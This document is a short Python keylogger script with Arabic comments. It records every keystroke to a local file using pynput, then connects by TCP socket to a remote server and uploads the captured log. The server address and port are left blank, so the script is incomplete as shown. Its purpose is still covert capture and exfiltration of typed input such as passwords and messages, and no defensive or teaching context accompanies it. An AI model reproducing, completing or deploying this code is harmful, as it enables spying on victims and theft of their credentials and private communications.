#!/bin/python3

import socket
import os
from pynput import keyboard

SERVER_DOMAIN = ""   # أو IP
PORT = 

file_path = "key_log.txt"

def on_press(key):
    try:
        with open(file_path, "a") as f:
            f.write(key.char)  # يكتب الحروف العادية
    except AttributeError:
        with open(file_path, "a") as f:
            f.write(f"[{key}]")  # يكتب المفاتيح الخاصة (مثل Enter, Shift, Ctrl)
    
# بدء الاستماع للكيبورد
with keyboard.Listener(on_press=on_press) as listener:
    print("Logging started... Press Ctrl+C to stop.")
    listener.join()
#........................................
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((SERVER_DOMAIN, PORT))

# اسم الملف
filename = os.path.basename(file_path)
client.sendall(filename.encode())

# حجم الملف
filesize = os.path.getsize(file_path)
client.sendall(str(filesize).encode())

# إرسال الملف
with open(file_path, "rb") as f:
    while True:
        data = f.read(4096)
        if not data:
            break
        client.sendall(data)

print("File sent successfully!")

client.close()
